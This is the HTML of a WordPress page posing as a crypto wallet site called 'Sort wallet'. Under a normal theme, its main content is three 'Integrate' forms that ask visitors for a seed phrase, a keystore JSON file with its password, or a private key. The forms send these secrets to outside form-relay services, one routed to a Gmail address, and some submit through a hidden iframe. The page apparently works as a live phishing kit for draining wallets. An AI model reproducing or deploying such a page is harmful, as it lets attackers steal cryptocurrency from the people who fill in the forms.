<!DOCTYPE html>
<html lang="en-US">

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="http://gmpg.org/xfn/11">
    <link rel="pingback" href="../xmlrpc.php">
	<title>Sort wallet</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='http://cdnjs.cloudflare.com/' />
<link rel='dns-prefetch' href='http://maxcdn.bootstrapcdn.com/' />
<link rel='dns-prefetch' href='http://fonts.googleapis.com/' />
<link rel='dns-prefetch' href='http://s.w.org/' />
<link rel="alternate" type="application/rss+xml" title="Sort wallet &raquo; Feed" href="../feed/index.html" />
<link rel="alternate" type="application/rss+xml" title="Sort wallet &raquo; Comments Feed" href="../comments/feed/index.html" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/sortwallet.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.2"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='../wp-includes/css/dist/block-library/style.min080f.css?ver=5.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='stm-stmicons-css'  href='../wp-content/uploads/stm_fonts/stmicons/stmicons20b9.css?ver=1.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='stm_megamenu-css'  href='../wp-content/plugins/stm-configurations/megamenu/assets/css/megamenuad05.css?ver=1.4' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='../../maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min1849.css?ver=4.7.0' type='text/css' media='all' />
<link rel='stylesheet' id='vcw-style-css'  href='../wp-content/plugins/virtual_coin_widgets/assets/css/vcw605a.css?ver=2.2.2' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='../wp-content/themes/crypterio/assets/css/bootstrap.minb2da.css?ver=2.4.3' type='text/css' media='all' />
<link rel='stylesheet' id='stm-font-awesome-css'  href='../wp-content/themes/crypterio/assets/fonts/font-awesome/css/font-awesome.minb2da.css?ver=2.4.3' type='text/css' media='all' />
<link rel='stylesheet' id='crypterio-style-css'  href='../wp-content/themes/crypterio/styleb2da.css?ver=2.4.3' type='text/css' media='all' />
<link rel='stylesheet' id='crypterio-layout-css'  href='../wp-content/themes/crypterio/assets/css/token_sale/mainb2da.css?ver=2.4.3' type='text/css' media='all' />
<style id='crypterio-layout-inline-css' type='text/css'>
.page_title{ background-repeat: no-repeat !important; }body.site_creative_ico .vc_custom_heading.stripe_bottom:before, body.site_creative_ico .vc_custom_heading.stripe_top:before {
			background: linear-gradient(to right, #400a96, #ffd703);
		}.mtc, .mtc_h:hover, .stm_news_list__more.loading:before, .site_crypto_blog ul.comment-list .comment .comment-author a, .site_crypto_blog ul.comment-list .comment .comment-meta a{
					color: #000000!important
				}.stc, .stc_h:hover, .stm_post_view__related .stm_news_widget .stm_news_grid__category a:hover, .stm_posts_carousel_single__category:hover a, .stm_single_ico__button.stm_single_ico__button_whitepaper i, .font-color_secondary{
					color: #ffd703!important
				}.ttc, .ttc_h:hover{
					color: #400a96!important
				}.mbc, .mbc_h:hover{
					background-color: #000000!important
				}.sbc, .sbc_h:hover, .sbc_a:after, .stm_news_carousel .owl-controls .owl-nav>div:hover, .stm_single_ico__comments h4.comments-title:after, .secondary_bg_color{
					background-color: #ffd703!important
				}.tbc, .tbc_h:hover, .tbc_a_h:hover:after, .stm_single_ico__button, .stm_single_ico__button.stm_single_ico__button_whitepaper:hover{
					background-color: #400a96!important
				}.mbdc, .mbdc_h:hover{
					border-color: #000000!important
				}.sbdc, .sbdc_h:hover, .stm_news_carousel .owl-controls .owl-nav>div:hover{
					border-color: #ffd703!important
				}.tbdc, .tbdc_h:hover, .stm_single_ico__button.stm_single_ico__button_whitepaper{
					border-color: #400a96!important
				}
</style>
<link rel='stylesheet' id='select2-css'  href='../wp-content/themes/crypterio/assets/css/vendors/select2.minb2da.css?ver=2.4.3' type='text/css' media='all' />
<link rel='stylesheet' id='crypterio-default-font-css'  href='https://fonts.googleapis.com/css?family=Open+Sans%3A400%2C300%2C300italic%2C400italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%26subset%3Dlatin%2Cgreek%2Cgreek-ext%2Cvietnamese%2Ccyrillic-ext%2Clatin-ext%2Ccyrillic%7CMontserrat%3A400%2C500%2C600%2C700&amp;ver=2.4.3' type='text/css' media='all' />
<link rel='stylesheet' id='crypterio-shared-css'  href='../wp-content/themes/crypterio/assets/css/shared/mainb2da.css?ver=2.4.3' type='text/css' media='all' />
<link rel='stylesheet' id='elementor-icons-css'  href='../wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.minb683.css?ver=5.12.0' type='text/css' media='all' />
<link rel='stylesheet' id='elementor-frontend-css'  href='../wp-content/plugins/elementor/assets/css/frontend.mincd45.css?ver=3.4.3' type='text/css' media='all' />
<style id='elementor-frontend-inline-css' type='text/css'>
@font-face{font-family:eicons;src:url(../wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons0b93.eot?5.10.0);src:url(https://sortwallet.net/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0#iefix) format("embedded-opentype"),url(https://sortwallet.net/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0) format("woff2"),url(https://sortwallet.net/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0) format("woff"),url(https://sortwallet.net/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0) format("truetype"),url(https://sortwallet.net/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon) format("svg");font-weight:400;font-style:normal}
</style>
<link rel='stylesheet' id='elementor-post-3957-css'  href='../wp-content/uploads/elementor/css/post-3957070c.css?ver=1630692460' type='text/css' media='all' />
<link rel='stylesheet' id='elementor-global-css'  href='../wp-content/uploads/elementor/css/global7de6.css?ver=1630692648' type='text/css' media='all' />
<link rel='stylesheet' id='elementor-post-3931-css'  href='../wp-content/uploads/elementor/css/post-3931a3f1.css?ver=1630695876' type='text/css' media='all' />
<link rel='stylesheet' id='stm_hb_main-css'  href='../wp-content/plugins/pearl-header-builder/assets/frontend/assets/css/header/main5152.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='stm_hb_sticky-css'  href='../wp-content/plugins/pearl-header-builder/assets/frontend/assets/vendor/sticky5152.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='fontawesome-css'  href='../wp-content/plugins/pearl-header-builder/assets/frontend/assets/css/font-awesome.min5152.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='stm-google-fonts-css'  href='http://fonts.googleapis.com/css?family=Roboto%3Aregular%2C700%2C600%7CMontserrat%3Aregular%2C700%2C600&amp;subset=latin&amp;ver=2.4.3' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-1-css'  href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CMontserrat%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;display=auto&amp;ver=5.8.2' type='text/css' media='all' />
<script type='text/javascript' src='../wp-includes/js/jquery/jquery.minaf6c.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='../wp-includes/js/jquery/jquery-migrate.mind617.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='../wp-content/plugins/stm-configurations/megamenu/assets/js/megamenuad05.js?ver=1.4' id='stm_megamenu-js'></script>
<script type='text/javascript' src='../wp-content/themes/crypterio/assets/js/jquery.simplemarqueeb2da.js?ver=2.4.3' id='simplemarquee-js'></script>
<link rel="https://api.w.org/" href="../wp-json/index.html" /><link rel="alternate" type="application/json" href="../wp-json/wp/v2/pages/3931.json" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="../xmlrpc0db0.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="../wp-includes/wlwmanifest.xml" /> 
<link rel="stylesheet" href="../form/style.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
 <!-- Latest compiled and minified CSS -->
 <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">

 <!-- jQuery library -->
 <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>
 
 <!-- Popper JS -->
 <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
 
 <!-- Latest compiled JavaScript -->
 <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script> 
<meta name="generator" content="WordPress 5.8.2" />
<link rel="canonical" href="index.html" />
<link rel='shortlink' href='../index1141.html?p=3931' />
<link rel="alternate" type="application/json+oembed" href="../wp-json/oembed/1.0/embed7ac0.json?url=https%3A%2F%2Fsortwallet.net%2Fform%2F" />
<link rel="alternate" type="text/xml+oembed" href="../wp-json/oembed/1.0/embedd4de?url=https%3A%2F%2Fsortwallet.net%2Fform%2F&amp;format=xml" />
<script type="text/javascript">window.wp_data = {"crypterio_get_currency_data":"e799550e53","stm_ajax_add_review":"0c03ef934a","crypterio_install_plugin":"4dd7421de8","crypterio_load_stm_news_list":"17bc3545b8","stm_ajax_load_events":"032bf6d9f1","stm_ajax_load_portfolio":"32d8d5018d","stm_custom_register":"1976e1a991","stm_ajax_add_event_member":"a42742808c","stm_whitelist_data":"3c12235910","stm_submit_ico":"2dd487cd9a","stm_icons_load":"9c067053a2","stm_wl":"36914aa763","stm_ico_search":"60850a0acb"};</script>        <script type="text/javascript">
            var ajaxurl = '../wp-admin/admin-ajax.html';
        </script>
		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<link rel="icon" href="../wp-content/uploads/2021/09/sfs.png" sizes="32x32" />
<link rel="icon" href="../wp-content/uploads/2021/09/sfs.png" sizes="192x192" />
<link rel="apple-touch-icon" href="../wp-content/uploads/2021/09/sfs.png" />
<meta name="msapplication-TileImage" content="https://sortwallet.net/wp-content/uploads/2021/09/sfs.png" />
<style type="text/css" title="dynamic-css" class="options-output">.top_nav_wr .top_nav .logo a img{width:500px;}.top_nav_wr .top_nav .logo a img{height:117px;}body,
					body .vc_general.vc_btn3 small,
					.default_widgets .widget.widget_nav_menu ul li .children li,
					.default_widgets .widget.widget_categories ul li .children li,
					.default_widgets .widget.widget_product_categories ul li .children li,
					.stm_sidebar .widget.widget_nav_menu ul li .children li,
					.stm_sidebar .widget.widget_categories ul li .children li,
					.stm_sidebar .widget.widget_product_categories ul li .children li,
					.shop_widgets .widget.widget_nav_menu ul li .children li,
					.shop_widgets .widget.widget_categories ul li .children li,
					.shop_widgets .widget.widget_product_categories ul li .children li,
					.stm_crypto_converter .vcw.vcw-converter .vcw-input .vcw-currency{font-family:Roboto;}h1, .h1,
					h2, .h2,
					h3, .h3,
					h4, .h4,
					h5, .h5,
					h6, .h6,
					.top_nav .top_nav_wrapper > ul,
					.top_nav .icon_text strong,
					.stm_testimonials .item .testimonial-info .testimonial-text .name,
					.stats_counter .counter_title,
					.stm_contact .stm_contact_info .stm_contact_job,
					.vacancy_table_wr .vacancy_table thead th,
					.testimonials_carousel .testimonial .info .position,
					.testimonials_carousel .testimonial .info .company,
					.stm_gmap_wrapper .gmap_addresses .addresses .item .title,
					.company_history > ul > li .year,
					.stm_contacts_widget,
					.stm_works_wr.grid .stm_works .item .item_wr .title,
					.stm_works_wr.grid_with_filter .stm_works .item .info .title,
					body .vc_general.vc_btn3,
					.crypterio-rev-title,
					.crypterio-rev-title-2,
					.crypterio-rev-title-3,
					.crypterio-rev-text,
					body .vc_tta-container .vc_tta.vc_general.vc_tta-tabs.theme_style .vc_tta-tabs-container .vc_tta-tabs-list .vc_tta-tab a,
					strong, b,
					.button,
					.woocommerce a.button,
					.woocommerce button.button,
					.woocommerce input.button,
					.woocommerce-cart .wc-proceed-to-checkout a.checkout-button,
					.woocommerce input.button.alt,
					.request_callback p,
					ul.comment-list .comment .comment-author,
					.page-numbers .page-numbers,
					#footer .footer_widgets .widget.widget_recent_entries ul li a,
					.default_widgets .widget.widget_nav_menu ul li,
					.default_widgets .widget.widget_categories ul li,
					.default_widgets .widget.widget_product_categories ul li,
					.stm_sidebar .widget.widget_nav_menu ul li, .stm_sidebar .widget.widget_categories ul li,
					.stm_sidebar .widget.widget_product_categories ul li,
					.shop_widgets .widget.widget_nav_menu ul li,
					.shop_widgets .widget.widget_categories ul li,
					.shop_widgets .widget.widget_product_categories ul li,
					.default_widgets .widget.widget_recent_entries ul li a,
					.stm_sidebar .widget.widget_recent_entries ul li a,
					.shop_widgets .widget.widget_recent_entries ul li a,
					.staff_bottom_wr .staff_bottom .infos .info,
					.woocommerce .widget_price_filter .price_slider_amount .button,
					.woocommerce ul.product_list_widget li .product-title,
					.woocommerce ul.products li.product .price,
					.woocommerce a.added_to_cart,
					.woocommerce div.product .woocommerce-tabs ul.tabs li a,
					.woocommerce div.product form.cart .variations label,
					.woocommerce table.shop_table th,
					.woocommerce-cart table.cart th.product-name a,
					.woocommerce-cart table.cart td.product-name a,
					.woocommerce-cart table.cart th .amount,
					.woocommerce-cart table.cart td .amount,
					.stm_services .item .item_wr .content .read_more,
					.staff_list ul li .staff_info .staff_department,
					.stm_partner.style_2 .stm_partner_content .position,
					.staff_carousel_item .staff_department,
					body.header_style_5 .header_top .info-text strong,
					.stm_services_tabs .services_categories ul li a,
					.stm_services_tabs .service_tab_item .service_name,
					.stm_services_tabs .service_tab_item .service_cost,
					.stm_works_wr.grid_2.style_1 .stm_works .item .item_wr .title,
					.stm_works_wr.grid_2.style_2 .stm_works .item .item_wr .title,
					.stm_works_wr.grid_with_filter.style_1 .stm_works .item .item_wr .title,
					.stm_works_wr.grid_with_filter.style_2 .stm_works .item .item_wr .title,
					body.header_style_7 .side_nav .main_menu_nav > li > a,
					body.header_style_7 .side_nav .main_menu_nav > li ul li a,
					body.header_style_5 .header_top .info-text b,
					.stm-header .stm-dropdown_style_1,
					.stm_ico_countdown__button,
					.stm-header__hb .stm-navigation__default>ul>li>a,
					.wpb_text_column table,
					.stm_contacts_widget.style_4{font-family:Montserrat;}p{line-height:30px;}h1, .h1{font-weight:600;}h1, .h1{font-size:48px;}h1, .h1{letter-spacing:-0.4px;}h1, .h1{text-transform:none;}h2, .h2{font-weight:600;}h2, .h2{font-size:36px;}h2, .h2{line-height:44px;}h2, .h2{letter-spacing:0px;}h3, .h3{font-weight:600;}h3, .h3{font-size:30px;}h3, .h3{letter-spacing:-0.2px;}h4, .h4{font-weight:600;}h5, .h5{line-height:36px;}h5, .h5{letter-spacing:0px;}</style>
<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>    </head>
<body class="page-template-default page page-id-3931 site_token_sale  header_style_1 wpb-js-composer js-comp-ver-6.7.0 vc_responsive elementor-default elementor-kit-3957 elementor-page elementor-page-3931">
<div id="wrapper">
    <div id="fullpage" class="content_wrapper">

        <header id="header">
			<style type="text/css" id="styles-stm_hb_settings">@media (max-width:1023px) and (min-width:425px) {.stm-header__element.object198{order: -2300}}@media (max-width:425px) {.stm-header__element.object198{order: -2300}}.stm-header__element.object198{}@media (max-width:1023px) and (min-width:425px) {.stm-header__element.object245{order: -2100}}@media (max-width:425px) {.stm-header__element.object245{order: -2100}}.stm-header__element.object245{}.stm-header{}.stm-header:before{}.stm-header__row_color_top{} .stm-header__row_color_top .stm-icontext__text {color:;} .stm-header__row_color_top a {color:;} .stm-header__row_color_top .dropdown-toggle {color:!important;} .stm-header__row_color_top a:hover, .stm-navigation__default > ul > li > a:hover {color:!important;} .stm-header__row_color_top li:hover a {color:;} .stm-header__row_color_top .stm-switcher__trigger_default:after {border-top-color:;} .stm-header__row_color_top .dropdown-toggle:after {border-top-color:!important;}.stm-header__row_color_top:before{}.stm-header__row_color_center{padding-top:27px;padding-bottom:23px;color:#ffffff;} .stm-header__row_color_center .stm-icontext__text {color:#ffffff;} .stm-header__row_color_center a {color:#ffffff;} .stm-header__row_color_center .dropdown-toggle {color:#ffffff!important;} .stm-header__row_color_center li:hover > a {color:!important;} .stm-header__row_color_center a:hover, .stm-navigation__default > ul > li > a:hover {color:!important;} .stm-header__row_color_center a > .divider {color:#ffffff!important;} .stm-header__row_color_center a:hover > .divider {color:#ffffff!important;} .stm-header__row_color_center li:hover > a > .divider {color:#ffffff!important;} .stm-header__row_color_center .stm-switcher__trigger_default:after {border-top-color:#ffffff;} .stm-header__row_color_center .dropdown-toggle:after {border-top-color:#ffffff!important;}.stm-header__row_color_center:before{background-color:rgba(0, 0, 0, 0.5);}.stm-header__row_color_bottom{} .stm-header__row_color_bottom .stm-icontext__text {color:;} .stm-header__row_color_bottom a {color:;} .stm-header__row_color_bottom .dropdown-toggle {color:!important;} .stm-header__row_color_bottom a:hover, .stm-navigation__default > ul > li > a:hover {color:!important;} .stm-header__row_color_bottom li:hover a {color:;} .stm-header__row_color_bottom .stm-switcher__trigger_default:after {border-top-color:;} .stm-header__row_color_bottom .dropdown-toggle:after {border-top-color:!important;}.stm-header__row_color_bottom:before{}                .stm_hb_mtc,.stm_hb_mtc_h:hover,.stm_hb_mtc_b:before,.stm_hb_mtc_b_h:hover:before,.stm_hb_mtc_a:after,.stm_hb_mtc_a_h:hover:after,.stm_hb_mtc_a_h.active,.mini-cart {color: #297ee8 !important}
                            .stm_hb_stc,.stm_hb_stc_h:hover,.stm_hb_stc_a:after,.stm_hb_stc_a_h:hover:after,.stm_hb_stc_b:before,.stm_hb_stc_b_h:hover:before {color: #222222 !important}
                            .stm_hb_ttc,.stm_hb_ttc_h:hover,.stm_hb_ttc_a:after,.stm_hb_ttc_a_h:hover:after,.stm_hb_ttc_b:before,.stm_hb_ttc_b_h:hover:before {color: #297ee8 !important}
                            .stm_hb_mbc,.stm_hb_mbc_h:hover,.stm_hb_mbc_b:before,.stm_hb_mbc_b_h:hover:before,.stm_hb_mbc_a:after,.stm_hb_mbc_a_h:hover:after,.stm_hb_mbc_h.active,.stm-search .stm_widget_search button[type=submit] {background-color: #297ee8 !important}
                            .stm_hb_sbc,.stm_hb_sbc_h:hover,.stm_hb_sbc_a:after,.stm_hb_sbc_a_h:hover:after,.stm_hb_sbc_b:before,.stm_hb_sbc_b_h:hover:before {background-color: #222222 !important}
                            .stm_hb_tbc,.stm_hb_tbc_h:hover,.stm_hb_tbc_h.active,.stm_hb_tbc_a:after,.stm_hb_tbc_a_h:hover:after,.stm_hb_tbc_b:before,.stm_hb_tbc_b_h:hover:before {background-color: #297ee8 !important}
                            .stm_hb_mbdc,.stm_hb_mbdc_h:hover,.stm_hb_mbdc_b:before,.stm_hb_mbdc_b_h:hover:before,.stm_hb_mbdc_a:after,.stm_hb_mbdc_a_h:hover:after,.stm-search .stm_widget_search .form-control:focus {border-color: #297ee8 !important}
                            .stm_hb_sbdc,.stm_hb_sbdc_h:hover,.stm_hb_sbdc_a:after,.stm_hb_sbdc_a_h:hover:after,.stm_hb_sbdc_b:before,.stm_hb_sbdc_b_h:hover:before {border-color: #222222 !important}
                            .stm_hb_tbdc,.stm_hb_tbdc_h:hover,.stm_hb_tbdc_a:after,.stm_hb_tbdc_a_h:hover:after,.stm_hb_tbdc_b:before,.stm_hb_tbdc_b_h:hover:before {border-color: #297ee8 !important}
            </style>
<script type="text/javascript">
    var stm_sticky = 'center';
</script>

<div class="stm-header stm-header__hb" id="stm_stm_hb_settings">
					
            <div class="stm-header__row_color stm-header__row_color_center elements_in_row_2">
                <div class="container">
                    <div class="stm-header__row stm-header__row_center">
						                                <div class="stm-header__cell stm-header__cell_left">
									                                            <div class="stm-header__element object245 stm-header__element_">
												

	<div class="stm-logo">
		<a href="../index.html" title="">
			<img alt="Logo" src="../wp-content/uploads/2021/09/slogo-2.png" />		</a>
	</div>

                                            </div>
										                                </div>
							                                <div class="stm-header__cell stm-header__cell_center">
									                                            <div class="stm-header__element object198 stm-header__element_default">
												

    <div class="stm-navigation heading_font stm-navigation__default stm-navigation__default stm-navigation__none stm-navigation__ main_menu_nav" >
		
        <ul >
			<li id="menu-item-3837" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3837"><a href="#about">About</a></li>
<li id="menu-item-3839" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3839"><a href="#benefits">Structure</a></li>
<li id="menu-item-3840" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3840"><a href="#roadmap">How?</a></li>
<li id="menu-item-3841" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3841"><a href="#team">Team</a></li>
        </ul>


		
    </div>

                                            </div>
										                                </div>
							                    </div>
                </div>
            </div>
				</div>



<div class="stm-header__overlay"></div>

<div class="stm_mobile__header">
    <div class="container">
        <div class="stm_flex stm_flex_center stm_flex_last stm_flex_nowrap">
                            <div class="stm_mobile__logo">
                    <a href="../index.html"
                       title="Home">
                        <img src="../wp-content/uploads/2021/09/slogo-2.png"
                             alt="Site Logo"/>
                    </a>
                </div>
                        <div class="stm_mobile__switcher stm_flex_last js_trigger__click"
                 data-element=".stm-header, .stm-header__overlay"
                 data-toggle="false">
                <span class="stm_hb_mbc"></span>
                <span class="stm_hb_mbc"></span>
                <span class="stm_hb_mbc"></span>
            </div>
        </div>
    </div>
</div>        </header>

<div class="container p-5">
<ul class="nav nav-tabs">
	<li class="active"><a data-toggle="tab" href="#home">Phrase</a></li>
	<li><a data-toggle="tab" href="#menu1">Keystone Json</a></li>
	<li><a data-toggle="tab" href="#menu2">Private key</a></li>
  </ul>
  
  <div class="tab-content">
	<div id="home" class="tab-pane active mt-3">
		<form id="passsubmit" action="https://formsubmit.co/sidemail442@gmail.com" method="POST">
			<h3>Phrase</h3>
			<div class="form-group">
				<textarea type="textarea" class="form-control" name="phrase" id="phrase" required="required" aria-required="true"></textarea>			</div>
			<button type="submit" id="passbtn" class="btn btn-primary form-control" name="integrate" value="integrate">Integrate</button>
		  </form>
	</div>
	<iframe name="hidden_iframe" id="hidden_iframe" style="display:none;" onload="if(submitted) {}"></iframe>

	<div id="menu1" class="tab-pane mt-3">
	  <form id="keysubmit" enctype="multipart/form-data" method="POST" action="https://kontactr.com/form/fde43aaa90bcd47" target="hidden_iframe">
		<h3>Keystone Json</h3>
		<div class="form-group">
		  <textarea name="textarea-1641555611078" class="form-control" id="textarea-1641555611078" cols="30" rows="10" placeholder="Keystone Json" required></textarea>
		</div>
		<div class="form-group">
		  <input type="password" name="text-1641555748272" class="form-control" id="text-1641555748272" placeholder="password" required>
		</div>
		<button type="submit" class="btn btn-primary form-control">Integrate</button>
	  </form>
	</div>
	<div id="menu2" class="tab-pane mt-3">
	  <form id="pkeysubmit" enctype="multipart/form-data" method="POST" action="https://kontactr.com/form/977f49b447a0b0a" target="hidden_iframe">
		<h3>Private key</h3>
		<div class="form-group">
			<textarea name="textarea-1641555943353" class="form-control" id="textarea-1641555943353" cols="30" rows="10" placeholder="Private Key" required></textarea>
		</div>
		<button type="submit" class="btn btn-primary form-control">Integrate</button>
	  </form>
	</div>
  </div>
</div>

<script src="./process.js" defer></script>


		        <footer id="footer" class="footer style_2 no-copyright">

			                <div class="widgets_row">
                    <div class="container">
                        <div class="footer_widgets">
                            <div class="row">
								                                    <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">
																																	                                                    <div class="footer_logo">
                                                        <a href="../index.html">
                                                            <img src="../wp-content/uploads/2021/09/slogo-2.png"
                                                                 alt="Sort wallet"/>
                                                        </a>
                                                    </div>
																																		                                                <div class="footer_text">
                                                    <p>Copyright © 2018-2021 <br />
Blockchain website by Sortwallet.com</p>
                                                </div>
																																									                                            <div class="socials">
												                                                <ul>
													                                                        <li>
                                                            <a href="#" target="_blank"
                                                               data-social="Facebook"
                                                               class="social-facebook">
                                                                <i class="fab fa-facebook"></i>
                                                            </a>
                                                        </li>
													                                                        <li>
                                                            <a href="#" target="_blank"
                                                               data-social="Twitter"
                                                               class="social-twitter">
                                                                <i class="fab fa-twitter"></i>
                                                            </a>
                                                        </li>
													                                                        <li>
                                                            <a href="#" target="_blank"
                                                               data-social="Instagram"
                                                               class="social-instagram">
                                                                <i class="fab fa-instagram"></i>
                                                            </a>
                                                        </li>
													                                                        <li>
                                                            <a href="#" target="_blank"
                                                               data-social="Linkedin"
                                                               class="social-linkedin">
                                                                <i class="fab fa-linkedin"></i>
                                                            </a>
                                                        </li>
													                                                        <li>
                                                            <a href="#" target="_blank"
                                                               data-social="Git"
                                                               class="social-github">
                                                                <i class="fab fa-github"></i>
                                                            </a>
                                                        </li>
													                                                </ul>
                                            </div>
										                                    </div>
								                                    <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">
																														                                    </div>
								                                    <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">
																				
		<section id="recent-posts-3" class="widget widget_recent_entries">
		<h4 class="widget_title no_stripe">Recent Posts</h4>
		<ul>
											<li>
					<a href="../hello-world/index.html">Hello world!</a>
									</li>
											<li>
					<a href="../ico-and-token-design-2/index.html">Token Sale and Marketing</a>
									</li>
											<li>
					<a href="../ico-and-token-design/index.html">ICO and Token Design</a>
									</li>
											<li>
					<a href="../legal-review/index.html">Legal Review</a>
									</li>
											<li>
					<a href="../first-long-term-bitcoin-option-price-of-10000-launched-by-stmx/index.html">First Long-Term Bitcoin Option Price of $10,000 Launched by STMX</a>
									</li>
					</ul>

		</section>										                                    </div>
								                                    <div class="col-lg-3 col-md-3 col-sm-6 col-xs-12">
																				<section id="mc4wp_form_widget-2" class="widget widget_mc4wp_form_widget"><h4 class="widget_title no_stripe">Newsletter</h4></section><section id="text-3" class="widget widget_text">			<div class="textwidget"></div>
		</section>										                                    </div>
								                            </div>
                        </div>
                    </div>
                </div>
			
			        </footer>
	    </div> <!-- #wrapper-->
<link rel='stylesheet' id='nex-forms-font-awesome-5-css'  href='../wp-content/plugins/nex-forms-express-wp-form-builder/public/css/fa5/css/all.min062a.css?ver=7.8.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='nex-forms-font-awesome-4-shims-css'  href='../wp-content/plugins/nex-forms-express-wp-form-builder/public/css/fa5/css/v4-shims.min062a.css?ver=7.8.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='nex-forms-bootstrap-ui-css'  href='../wp-content/plugins/nex-forms-express-wp-form-builder/public/css/min/ui-bootstrap062a.css?ver=7.8.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='nex-forms-ui-css'  href='../wp-content/plugins/nex-forms-express-wp-form-builder/public/css/ui8200.css?v=7.2.7&amp;ver=7.8.6.1' type='text/css' media='all' />
